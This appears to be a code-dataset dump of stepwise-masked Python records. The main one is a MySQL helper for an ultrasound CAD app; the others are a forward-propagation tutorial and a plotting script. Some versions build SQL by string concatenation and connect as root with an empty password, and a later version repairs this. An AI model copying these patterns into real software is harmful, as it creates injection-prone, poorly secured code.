'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
import numpy as np
import mysql.connector
from mysql.connector import Error
import matplotlib.pyplot as plt
def readData():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor = connection.cursor()
cursor.execute(sql_select_Query)
records = cursor.fetchall()
data = records[0]
filename = data[2]
dataSignal = []
my_file = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +
filename, 'r')
for line in my_file.readlines():
if line[-1:] == '\n':
dataSignal.append(line[:-1])
else:
dataSignal.append(line)
my_file.close()
if connection.is_connected():
cursor.close()
connection.close()
return dataSignal, filename
def saveData(data, label, filename):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
filename_hasil = 'hasilproses_' + filename
with open(
'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/'
+ filename_hasil, 'w') as f:
for row in data:
f.write(str(row) + '\n')
f.close()
sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select)
records = cursor.fetchall()
data = records[0]
id_pasien = data[0]
print(label[0])
sql_update = ("UPDATE pasien SET hasilproses = '" + filename_hasil +
"',label = '" + str(label[0]) + "' WHERE id = " + str(id_pasien))
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
def getFiturEkstraksi():
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'
cursor.execute(sql_select_Query)
fiturname = cursor.fetchall()
fitur = np.genfromtxt(
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +
fiturname, delimiter=',')
if connection.is_connected():
cursor.close()
connection.close()
return fitur
def saveFiturEkstraksi(fitur, label):
connection = mysql.connector.connect(host='localhost', database=
'cad_ultrasound', user='root', password='')
cursor = connection.cursor()
fiturname = 'fitur.txt'
rowfitur = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
fiturname, 'w')
for row in range(len(fitur)):
np.savetxt(rowfitur, row)
rowfitur.close()
labelname = 'label.txt'
rowlabel = open(
'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +
labelname, 'w')
for row in range(len(label)):
np.savetxt(rowlabel, row)
rowlabel.close()
sql_update = ("UPDATE fitur_ekstraksis SET fitur = '" + fiturname +
"', label = '" + labelname + "' WHERE id = 1")
cursor.execute(sql_update)
connection.commit()
if connection.is_connected():
cursor.close()
connection.close()
return print('sukses')
<|reserved_special_token_1|>
import numpy as np
import mysql.connector
from mysql.connector import Error
import matplotlib.pyplot as plt
def readData():
    """Load the first dataset row from MySQL and read its signal file.

    Returns:
        tuple: ``(dataSignal, filename)`` where ``dataSignal`` is a list of
        the file's lines with trailing newlines removed and ``filename`` is
        the ``pathdata`` value of the first row in ``datasets``.
    """
    connection = mysql.connector.connect(host='localhost',database='cad_ultrasound',user='root',password='')
    sql_select_Query = "SELECT id_pasien,nama,pathdata FROM datasets"
    cursor = connection.cursor()
    cursor.execute(sql_select_Query)
    records = cursor.fetchall()
    # Only the first dataset row is processed; pathdata holds the file name.
    data = records[0]
    filename = data[2]
    dataSignal = []
    # Context manager guarantees the handle is closed even if a read fails
    # (the original leaked the open file on any exception before close()).
    with open("C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/" + filename, "r") as my_file:
        for line in my_file:
            # Strip a single trailing newline; keep the content otherwise intact.
            dataSignal.append(line[:-1] if line.endswith("\n") else line)
    if (connection.is_connected()):
        cursor.close()
        connection.close()
    return dataSignal, filename
def saveData(data,label,filename):
    """Write processed rows to disk and record the result on the patient row.

    Args:
        data: iterable of processed values; each item is written as one line.
        label: sequence whose first element is the predicted class label.
        filename: original upload file name; output is saved as
            ``hasilproses_<filename>``.
    """
    connection = mysql.connector.connect(host='localhost', database='cad_ultrasound', user='root', password='')
    cursor = connection.cursor()
    filename_hasil = 'hasilproses_'+filename
    # The with-block closes the file; the original's explicit f.close() inside
    # the with-block was redundant.
    with open(r'C:\xampp\htdocs\projectCAD\public\storage\upload/files\hasilproses/' + filename_hasil, 'w') as f:
        for row in data:
            f.write(str(row) + '\n')
    # Select Pasien from database (first dataset row identifies the patient).
    sql_select = "SELECT id_pasien,nama,pathdata FROM datasets"
    cursor.execute(sql_select)
    records = cursor.fetchall()
    id_pasien = records[0][0]
    print(label[0])
    # Parameterized query instead of string concatenation (SQL injection fix).
    cursor.execute(
        "UPDATE pasien SET hasilproses = %s, label = %s WHERE id = %s",
        (filename_hasil, str(label[0]), id_pasien))
    connection.commit()
    if (connection.is_connected()):
        cursor.close()
        connection.close()
    return print("sukses")
def getFiturEkstraksi():
    """Load the stored feature matrix from the feature file on disk.

    Returns:
        numpy.ndarray: comma-separated feature values parsed by
        ``np.genfromtxt``.
    """
    connection = mysql.connector.connect(host='localhost',
                                         database='cad_ultrasound',
                                         user='root',
                                         password='')
    cursor = connection.cursor()
    # NOTE(review): this reads `datasets`, but saveFiturEkstraksi stores the
    # feature file name in `fitur_ekstraksis` — confirm the intended table.
    sql_select_Query = "SELECT id_pasien,nama,pathdata FROM datasets"
    cursor.execute(sql_select_Query)
    # fetchall() returns a list of row tuples; the original concatenated the
    # whole list into the path string (TypeError at runtime). Extract the
    # file-name column of the first row, matching readData's pattern.
    fiturname = cursor.fetchall()[0][2]
    fitur = np.genfromtxt(r"C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/" + fiturname, delimiter=',')
    if (connection.is_connected()):
        cursor.close()
        connection.close()
    return fitur
def saveFiturEkstraksi(fitur, label):
    """Persist the feature matrix and labels to text files and record the
    filenames in the fitur_ekstraksis table (row id = 1).

    Parameters:
        fitur: 2-D array-like of extracted features (one row per sample).
        label: 1-D array-like of class labels, aligned with `fitur`.

    Returns None (prints "sukses" on completion).
    """
    connection = mysql.connector.connect(host='localhost',
                                         database='cad_ultrasound',
                                         user='root',
                                         password='')
    cursor = connection.cursor()

    # BUG FIX: the original looped `for row in range(len(fitur))` and passed
    # the loop *index* to np.savetxt, so the files contained 0..n-1 instead
    # of the data. savetxt writes the whole array in a single call.
    fiturname = 'fitur.txt'
    with open("C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/" + fiturname, "w") as rowfitur:
        np.savetxt(rowfitur, np.asarray(fitur))

    labelname = 'label.txt'
    with open("C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/" + labelname, "w") as rowlabel:
        np.savetxt(rowlabel, np.asarray(label))

    # Parameterized UPDATE instead of string concatenation (values here are
    # constants, but this keeps the query style consistent and safe).
    sql_update = "UPDATE fitur_ekstraksis SET fitur = %s, label = %s WHERE id = 1"
    cursor.execute(sql_update, (fiturname, labelname))
    connection.commit()

    if connection.is_connected():
        cursor.close()
        connection.close()

    return print("sukses")
|
flexible
|
{
"blob_id": "4d7696c832f9255fbc68040b61fde12e057c06fa",
"index": 3899,
"step-1": "<mask token>\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-2": "<mask token>\n\n\ndef saveData(data, label, filename):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n filename_hasil = 'hasilproses_' + filename\n with open(\n 'C:\\\\xampp\\\\htdocs\\\\projectCAD\\\\public\\\\storage\\\\upload/files\\\\hasilproses/'\n + filename_hasil, 'w') as f:\n for row in data:\n f.write(str(row) + '\\n')\n f.close()\n sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select)\n records = cursor.fetchall()\n data = records[0]\n id_pasien = data[0]\n print(label[0])\n sql_update = (\"UPDATE pasien SET hasilproses = '\" + filename_hasil +\n \"',label = '\" + str(label[0]) + \"' WHERE id = \" + str(id_pasien))\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n 
np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-3": "<mask token>\n\n\ndef readData():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor = connection.cursor()\n cursor.execute(sql_select_Query)\n records = cursor.fetchall()\n data = records[0]\n filename = data[2]\n dataSignal = []\n my_file = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +\n filename, 'r')\n for line in my_file.readlines():\n if line[-1:] == '\\n':\n dataSignal.append(line[:-1])\n else:\n dataSignal.append(line)\n my_file.close()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return dataSignal, filename\n\n\ndef saveData(data, label, filename):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n filename_hasil = 'hasilproses_' + filename\n with open(\n 'C:\\\\xampp\\\\htdocs\\\\projectCAD\\\\public\\\\storage\\\\upload/files\\\\hasilproses/'\n + filename_hasil, 'w') as f:\n for row in data:\n f.write(str(row) + '\\n')\n f.close()\n sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select)\n records = cursor.fetchall()\n data = records[0]\n id_pasien = data[0]\n print(label[0])\n sql_update = (\"UPDATE pasien SET hasilproses = '\" + filename_hasil +\n \"',label = '\" + str(label[0]) + \"' WHERE id = \" + str(id_pasien))\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 
'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-4": "import numpy as np\nimport mysql.connector\nfrom mysql.connector import Error\nimport matplotlib.pyplot as plt\n\n\ndef readData():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor = connection.cursor()\n cursor.execute(sql_select_Query)\n records = cursor.fetchall()\n data = records[0]\n filename = data[2]\n dataSignal = []\n my_file = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/' +\n filename, 'r')\n for line in my_file.readlines():\n if line[-1:] == '\\n':\n dataSignal.append(line[:-1])\n else:\n dataSignal.append(line)\n my_file.close()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return dataSignal, filename\n\n\ndef saveData(data, label, filename):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n filename_hasil = 'hasilproses_' + filename\n with open(\n 'C:\\\\xampp\\\\htdocs\\\\projectCAD\\\\public\\\\storage\\\\upload/files\\\\hasilproses/'\n + filename_hasil, 'w') as f:\n for row in data:\n f.write(str(row) + '\\n')\n f.close()\n sql_select = 'SELECT id_pasien,nama,pathdata FROM datasets'\n cursor.execute(sql_select)\n records = cursor.fetchall()\n data = records[0]\n id_pasien = data[0]\n print(label[0])\n sql_update = (\"UPDATE pasien SET hasilproses = '\" + filename_hasil +\n \"',label = '\" + str(label[0]) + \"' WHERE id = \" + str(id_pasien))\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n\n\ndef getFiturEkstraksi():\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n sql_select_Query = 'SELECT id_pasien,nama,pathdata FROM datasets'\n 
cursor.execute(sql_select_Query)\n fiturname = cursor.fetchall()\n fitur = np.genfromtxt(\n 'C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/' +\n fiturname, delimiter=',')\n if connection.is_connected():\n cursor.close()\n connection.close()\n return fitur\n\n\ndef saveFiturEkstraksi(fitur, label):\n connection = mysql.connector.connect(host='localhost', database=\n 'cad_ultrasound', user='root', password='')\n cursor = connection.cursor()\n fiturname = 'fitur.txt'\n rowfitur = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n fiturname, 'w')\n for row in range(len(fitur)):\n np.savetxt(rowfitur, row)\n rowfitur.close()\n labelname = 'label.txt'\n rowlabel = open(\n 'C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/' +\n labelname, 'w')\n for row in range(len(label)):\n np.savetxt(rowlabel, row)\n rowlabel.close()\n sql_update = (\"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname +\n \"', label = '\" + labelname + \"' WHERE id = 1\")\n cursor.execute(sql_update)\n connection.commit()\n if connection.is_connected():\n cursor.close()\n connection.close()\n return print('sukses')\n",
"step-5": "import numpy as np\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\nimport matplotlib.pyplot as plt\r\n\r\ndef readData():\r\n connection = mysql.connector.connect(host='localhost',database='cad_ultrasound',user='root',password='')\r\n\r\n sql_select_Query = \"SELECT id_pasien,nama,pathdata FROM datasets\"\r\n cursor = connection.cursor()\r\n cursor.execute(sql_select_Query)\r\n records = cursor.fetchall()\r\n data = records[0]\r\n # nama_pasien = data[1]\r\n filename = data[2]\r\n # dataSignal = np.genfromtxt(r\"C:/xampp/htdocs/projectCAD/storage/app/public/upload/files/\"+filename,delimiter=',')\r\n\r\n ## READ TXT FILE\r\n dataSignal = []\r\n my_file = open(\"C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/\" + filename, \"r\")\r\n for line in my_file.readlines():\r\n if line[-1:] == \"\\n\":\r\n dataSignal.append(line[:-1])\r\n else:\r\n dataSignal.append(line)\r\n my_file.close()\r\n\r\n # C:/xampp/htdocs/projectCAD/public/storage/upload/files/hasilproses\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n return dataSignal, filename\r\n\r\ndef saveData(data,label,filename):\r\n connection = mysql.connector.connect(host='localhost', database='cad_ultrasound', user='root', password='')\r\n cursor = connection.cursor()\r\n\r\n filename_hasil = 'hasilproses_'+filename\r\n with open(r'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/' + filename_hasil, 'w') as f:\r\n for row in data:\r\n f.write(str(row) + '\\n')\r\n f.close()\r\n\r\n #Select Pasien from database\r\n sql_select = \"SELECT id_pasien,nama,pathdata FROM datasets\"\r\n cursor.execute(sql_select)\r\n records = cursor.fetchall()\r\n data = records[0]\r\n id_pasien = data[0]\r\n print(label[0])\r\n\r\n sql_update = \"UPDATE pasien SET hasilproses = '\" + filename_hasil + \"',label = '\"+str(label[0])+\"' WHERE id = \"+str(id_pasien)\r\n cursor.execute(sql_update)\r\n connection.commit()\r\n\r\n if 
(connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n\r\n return print(\"sukses\")\r\n\r\ndef getFiturEkstraksi():\r\n connection = mysql.connector.connect(host='localhost',\r\n database='cad_ultrasound',\r\n user='root',\r\n password='')\r\n cursor = connection.cursor()\r\n sql_select_Query = \"SELECT id_pasien,nama,pathdata FROM datasets\"\r\n cursor.execute(sql_select_Query)\r\n fiturname = cursor.fetchall()\r\n fitur = np.genfromtxt(r\"C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/\" + fiturname, delimiter=',')\r\n\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n\r\n return fitur\r\n\r\ndef saveFiturEkstraksi(fitur,label):\r\n connection = mysql.connector.connect(host='localhost',\r\n database='cad_ultrasound',\r\n user='root',\r\n password='')\r\n cursor = connection.cursor()\r\n # dbfitur = getFiturEkstraksi()\r\n # dbfitur.append(fitur)\r\n fiturname = 'fitur.txt'\r\n rowfitur = open(\"C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/\"+fiturname, \"w\")\r\n for row in range(len(fitur)):\r\n np.savetxt(rowfitur, row)\r\n rowfitur.close()\r\n\r\n labelname = 'label.txt'\r\n rowlabel = open(\"C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/\"+labelname, \"w\")\r\n for row in range(len(label)):\r\n np.savetxt(rowlabel,row)\r\n rowlabel.close()\r\n\r\n sql_update = \"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname + \"', label = '\" + labelname + \"' WHERE id = 1\"\r\n cursor.execute(sql_update)\r\n connection.commit()\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n\r\n return print(\"sukses\")",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""
Prog: helloworld.py
Name: Samuel doyle
Date: 18/04/18
Desc: My first program!
"""
print('Hello, world!')
|
normal
|
{
"blob_id": "513a2bbcf7a63baf900b73b18cf25618937dc7d0",
"index": 1054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Hello, world!')\n",
"step-3": "\"\"\"\nProg: helloworld.py\nName: Samuel doyle\nDate: 18/04/18\nDesc: My first program!\n\"\"\"\n\nprint('Hello, world!')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(weights)
<|reserved_special_token_0|>
print(hidden_layer_vals)
<|reserved_special_token_0|>
print(output_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
input_data = np.array([2, 3])
weights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),
'output': np.array([2, -1])}
print(weights)
node_0_val = (input_data * weights['node_0']).sum()
node_1_val = (input_data * weights['node_1']).sum()
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
output_val = (hidden_layer_vals * weights['output']).sum()
print(output_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy as np
input_data = np.array([2, 3])
weights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),
'output': np.array([2, -1])}
print(weights)
node_0_val = (input_data * weights['node_0']).sum()
node_1_val = (input_data * weights['node_1']).sum()
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
output_val = (hidden_layer_vals * weights['output']).sum()
print(output_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#manual forward propagation
#based on a course I got from Datacamp.com 'Deep Learning in Python'
#python3 ~/Documents/pyfiles/dl/forward.py
#imports
import numpy as np
#we are going to simulate a neural network forward propagation algorithm
#see the picture forwardPropagation.png for more info
#the basics are it moves from input layer, hidden layer, output layer
#input is data observed or fitted
#hidden is all the behind the scenes way the model works with inputs
#output is the target, the product of processes in the hidden layer
#say we have 2 features in the input layer for a single observation
#those features are numerical, with values 2 and 3
input_data = np.array([2,3])
#from the input layer, interactions between features are represented by nodes in the hidden layer
#the significance of each interaction is denoted by parameters called weights
#weights are directly used to scale the input data into proper significance
#after the initial layer is complete, then the nodes themselves interact with each other
#in the exact same way, each node connects with weights to a new node
#in this case it goes into the output layer after the 2 hidden nodes
#the connections for the nodes to the output have weights too
weights = {'node_0': np.array([1,1]), 'node_1': np.array([-1,1]), 'output': np.array([2,-1])}
print(weights)
#the algorithm for caculating forward propagation is as follows
#(input val1 * weight val1) + (input val2, weight val2)
node_0_val = (input_data*weights['node_0']).sum()
node_1_val = (input_data*weights['node_1']).sum()
#for simplicity, we will hold the entire hidden layer in a variable
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
#to calculate to output layer, it works the same way
output_val = (hidden_layer_vals*weights['output']).sum()
print(output_val)
#so here you can see for the given weights those values end up as 9 for the output.
#this is the basis of forward propagation
#output to console
'''
{'output': array([ 2, -1]), 'node_0': array([1, 1]), 'node_1': array([-1, 1])}
[5 1]
9
'''
|
flexible
|
{
"blob_id": "6a09311b5b3b876fd94ed0a9cce30e070528f22c",
"index": 2993,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(weights)\n<mask token>\nprint(hidden_layer_vals)\n<mask token>\nprint(output_val)\n<mask token>\n",
"step-3": "<mask token>\ninput_data = np.array([2, 3])\nweights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),\n 'output': np.array([2, -1])}\nprint(weights)\nnode_0_val = (input_data * weights['node_0']).sum()\nnode_1_val = (input_data * weights['node_1']).sum()\nhidden_layer_vals = np.array([node_0_val, node_1_val])\nprint(hidden_layer_vals)\noutput_val = (hidden_layer_vals * weights['output']).sum()\nprint(output_val)\n<mask token>\n",
"step-4": "import numpy as np\ninput_data = np.array([2, 3])\nweights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),\n 'output': np.array([2, -1])}\nprint(weights)\nnode_0_val = (input_data * weights['node_0']).sum()\nnode_1_val = (input_data * weights['node_1']).sum()\nhidden_layer_vals = np.array([node_0_val, node_1_val])\nprint(hidden_layer_vals)\noutput_val = (hidden_layer_vals * weights['output']).sum()\nprint(output_val)\n<mask token>\n",
"step-5": "#manual forward propagation\n#based on a course I got from Datacamp.com 'Deep Learning in Python'\n#python3 ~/Documents/pyfiles/dl/forward.py\n\n\n#imports\nimport numpy as np\n\n#we are going to simulate a neural network forward propagation algorithm\n#see the picture forwardPropagation.png for more info\n#the basics are it moves from input layer, hidden layer, output layer\n#input is data observed or fitted\n#hidden is all the behind the scenes way the model works with inputs\n#output is the target, the product of processes in the hidden layer\n\n#say we have 2 features in the input layer for a single observation\n#those features are numerical, with values 2 and 3\ninput_data = np.array([2,3])\n\n#from the input layer, interactions between features are represented by nodes in the hidden layer\n#the significance of each interaction is denoted by parameters called weights\n#weights are directly used to scale the input data into proper significance\n#after the initial layer is complete, then the nodes themselves interact with each other\n#in the exact same way, each node connects with weights to a new node\n#in this case it goes into the output layer after the 2 hidden nodes\n#the connections for the nodes to the output have weights too\nweights = {'node_0': np.array([1,1]), 'node_1': np.array([-1,1]), 'output': np.array([2,-1])}\nprint(weights)\n\n#the algorithm for caculating forward propagation is as follows\n#(input val1 * weight val1) + (input val2, weight val2)\nnode_0_val = (input_data*weights['node_0']).sum()\nnode_1_val = (input_data*weights['node_1']).sum()\n\n#for simplicity, we will hold the entire hidden layer in a variable\nhidden_layer_vals = np.array([node_0_val, node_1_val])\nprint(hidden_layer_vals)\n\n#to calculate to output layer, it works the same way\noutput_val = (hidden_layer_vals*weights['output']).sum()\nprint(output_val)\n\n#so here you can see for the given weights those values end up as 9 for the output.\n#this is the basis of 
forward propagation\n\n#output to console\n'''\n{'output': array([ 2, -1]), 'node_0': array([1, 1]), 'node_1': array([-1, 1])}\n[5 1]\n9\n'''\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""Plot the A2/A1 Bragg cross-section ratio versus detuning for several
AFM sizes and save the multi-panel figure to a2a1_detuning.png."""
import numpy as np
from scipy import stats
from statarray import statdat

import matplotlib.pyplot as plt
import matplotlib

from matplotlib import rc
rc('font', **{'family': 'serif'})

# Data file with the elastic-scattering results.
datfile = 'data001/a2a1_detuning_allelastic.dat'

# Values of nafm (AFM size in sites) for which panels will be shown.
nafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]

cols = 2
# BUG FIX: ceil division must be integer — '/' yields a float in Python 3,
# which GridSpec and the subplot index below reject.
rows = len(nafms) // 2 + len(nafms) % 2

figure = plt.figure(figsize=(10.8, 3.6 * rows))
gs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)

import fetchdata
from uncertainties import unumpy

for i, nafm in enumerate(nafms):
    a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.}, 'det', datfile)

    # Put the units in the cross section (cm^2); 671 nm is the Li D line.
    sunits = 9 * (671e-7 ** 2) / 16 / (np.pi ** 2)
    a1[:, 1] = sunits * a1[:, 1]
    a1[:, 2] = sunits * a1[:, 2]
    a2[:, 1] = sunits * a2[:, 1]
    a2[:, 2] = sunits * a2[:, 2]

    # Fill the grid column-major: panel i goes to (row i % rows, col i // rows).
    # BUG FIX: integer division — a float index raised TypeError in Python 3.
    ax = plt.subplot(gs[i % rows, i // rows])
    ax.set_title('AFM = %d sites' % nafm)

    # Propagate measurement uncertainties through the A2/A1 ratio.
    a1s = unumpy.uarray(a1[:, 1], a1[:, 2])
    a2s = unumpy.uarray(a2[:, 1], a2[:, 2])
    a2a1 = a2s / a1s
    a2a1_mean = unumpy.nominal_values(a2a1)
    a2a1_std = unumpy.std_devs(a2a1)

    ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std,
                capsize=0., elinewidth=1.,
                fmt='.', ecolor='blue', mec='blue',
                mew=1., ms=5.,
                marker='o', mfc='lightblue',
                label="A2/A1")

    ax.set_ylabel('A2/A1')
    ax.grid()
    ax.set_xlabel('Detuning from state 2 ($\Gamma$)')

    # The largest AFM is narrow in detuning; zoom its x axis.
    if nafm == 40:
        ax.set_xlim(-10, 10)

figure.savefig('a2a1_detuning.png', dpi=140)
|
normal
|
{
"blob_id": "feac1092d1aaf70eb4d4df919e434cdc1aa9c826",
"index": 9171,
"step-1": "<mask token>\n",
